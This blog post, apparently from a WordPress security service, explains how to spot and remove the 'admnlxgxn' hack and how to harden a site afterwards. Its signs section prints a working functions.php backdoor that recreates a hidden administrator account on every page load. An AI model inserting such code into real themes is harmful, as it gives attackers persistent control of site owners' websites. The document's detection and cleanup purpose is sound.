If you notice any weird stuff happening on your WordPress site, like strange posts or redirects to spammy casino pages, then you might be dealing with the “admnlxgxn” hack. This is a tricky malware attack that targeted thousands of WordPress sites in 2025 by adding fake users and backdoors to push gambling spam.
Yes, it is a serious issue, but don’t worry; today in this blog post, we will assist you in spotting the signs of this hack and how to remove malware from a WordPress site with proper WordPress malware removal steps. We will also share some tips to keep your site safe with WordPress malware cleanup, WordPress virus removal, and WordPress security hardening.
If you are worried and thinking, “My WordPress website is hacked!” or just want to stay ready, then we are here to guide you with simple steps for fixing a hacked WordPress site, removing viruses, and doing a full website hack repair.
Signs Your Website Might Be Hacked by “admnlxgxn“
The admnlxgxn hack is sneaky, but the signs are clear by which indicate that your website is hacked. However, a WordPress site that has been hacked with malware that can be spotted easily by finding these red flags below.
- Fake “admnlxgxn” User in Admin Panel: Log into your WordPress dashboard and go to Users. If you see a user named “admnlxgxn” (or something similar) listed as an administrator, then it’s a big warning sign that your website is hacked. However, hackers create this fake user to control your site.
- Suspicious Code in functions.php: Sometimes hackers hide a script in your theme’s functions.php file (found in wp-content/themes/your-theme/). This script will automatically create a new admnlxgxn user and prevent it from being removed, even if you attempt to delete it.
function wpb_admin_account(){
$user = 'admnlxgxn';
$pass = 'randompassword';
$email = 'wordpresupportadm11@gmail.com';
if ( !username_exists( $user ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $user, $pass, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
} }
add_action('init','wpb_admin_account');
Sometimes the code is hidden (encrypted), and sometimes it shows clearly. You need to find it, and Wordfence’s sensitive mode, a WordPress malware scanner, can catch this malware backdoor.
- Unknown Themes or Plugins: Spot any weird themes or plugins you didn’t install? These are often backdoors that hackers use to keep access. They might look legit, but are designed for a WordPress site redirecting to spam or injecting casino links.
- Spam Posts or Redirects: Your site might suddenly have posts about online casinos or adult products, often with weird titles like “Pinco Casino Bonus 4815.” Visitors might also get redirected to sketchy sites, classic signs of a WordPress hacked site fix.
If any of these happened to your website, then don’t panic. You can clean a hacked WordPress website with the right steps. Now, let’s have a look at how to remove malware from a WordPress site and save a WordPress website.
How to Remove Backdoor Malware from Your WordPress Site?
To remove the admnlxgxn hack, you need to work a little bit, but you can do it. Follow these steps for WordPress malware cleanup to get your site back to normal. However, if you feel this is complicated, then you can always hire WordPress malware removal experts for a professional WordPress malware cleanup.
- Backup Your Site (Do It Safely!): Before touching anything, back up your site. This saves your content in case something goes wrong during WordPress virus removal. Use trusted plugins like:
- UpdraftPlus: Easy to use, saves backups to Google Drive or Dropbox.
- All-in-One WP Migration: Great for full site backups.
- UpdraftPlus: Easy to use, saves backups to Google Drive or Dropbox.
- Scan with Wordfence in Sensitive Mode: Now, install the Wordfence plugin (free version works fine) and run a scan in sensitive mode. It will scan carefully to uncover hidden malware, like secret scripts or fake users. Wordfence is one of the top WordPress malware scanners and will flag anything suspicious, like admnlxgxn-related malicious codes.
- Remove Unknown Themes and Plugins: Some unknown fake themes and plugins don’t show up in the Appearance > Themes or Plugins section inside wp-admin. To find them all, use your hosting file manager, cPanel, or FTP to verify all the plugin and theme names in the wp-content/themes and wp-content/plugins folders.
If they do appear in the dashboard:
- Under Appearance > Themes, please remove any themes you do not recognize.
- Under Plugins, please remove any plugins that you did not install.
If you are not sure what’s legit, then compare with your site’s original setup or check with your developer.
- Search Your Database for Malware: Moreover, Hackers Can Also hide spam in your WordPress database. Use a tool like phpMyAdmin (available in your hosting control panel) to search for:
- Keywords like “admnlxgxn,” “casino,” or “Pinco.”
- Suspicious links or scripts.
Delete any spam posts or comments you find. However, be careful before removing anything; only remove what is clearly malicious to avoid compromising your site.
- Delete Fake Users Like “admnlxgxn“: In your WordPress dashboard, go to Users and delete the admnlxgxn user (or any unknown accounts). If it continuously happens to you, then check your theme’s functions.php file for a script creating them. Use FTP or your hosting file manager to access wp-content/themes/your-theme/functions.php and remove any weird code.
- Reinstall Themes and Plugins: To stay safe, reinstall your themes and plugins to replace any infected files. Try the Force Reinstall plugin; it will make this super easy by reinstalling a fresh version from the WordPress repository without losing settings.
- Update All Passwords: Change every password to lock and keep hackers out:
- WordPress Admin: Update all user passwords in the dashboard.
- FTP/SFTP: Reset all the credentials in your hosting panel.
- cPanel/Hosting Account: Create a strong, new password.
- Database: Update the database password in wp-config.php.
Use long, random passwords (at least 12 characters) with letters, numbers, and symbols.
- Double-Check and Monitor: Run another Wordfence scan to confirm that malware is gone. Also, check your site in Google Search Console for any “hacked content” or warnings. Keep an eye on logs regularly for a few weeks to ensure no new unusual activity appears.
Preventing Future Hacks: Simple WordPress Security Tips
Once you have cleaned your site, it is now time to protect it with website security and malware protection for WordPress. Here’s how:
- Use a Firewall: Install a WordPress firewall and security plugin, such as Wordfence or an all-in-one WP Security plugin, to block malicious traffic.
- Keep Everything Updated: Regularly update WordPress, themes, and plugins to fix security weaknesses.
- Strong Passwords & 2FA: Use complex passwords and add two-factor authentication (2FA) for extra security.
- Limit Login Attempts: You can use plugins like Limit Login Attempts Reloaded to stop hackers from guessing passwords.
- Regular Scans: Once a week, schedule a scan with a WordPress malware scanner to catch issues early.
- Backup Often: Set up automatic backups with UpdraftPlus so you’re always prepared.
For extra safety, consider a WordPress security service provider that offers website security and malware protection for WordPress.
Why You Should Act Fast
The admnlxgxn hack isn’t just annoying, it can hurt your SEO, take your visitors away, and even get your site blacklisted by Google. Acting quickly with a WordPress website malware removal service or hiring WordPress malware removal experts will help you to fix a hacked WordPress site before it gets worse.
Wrap-Up: Take Control of Your Site Today
Dealing with a WordPress site hacked with malware like admnlxgxn is painful and unexpected, but you can fix it. Use our guide to remove malware from a WordPress site, secure it with WordPress malware protection, or hire a professional WordPress malware cleanup team if needed.
Don’t let hackers ruin your hard work; take action now with strong website security and malware protection for WordPress.
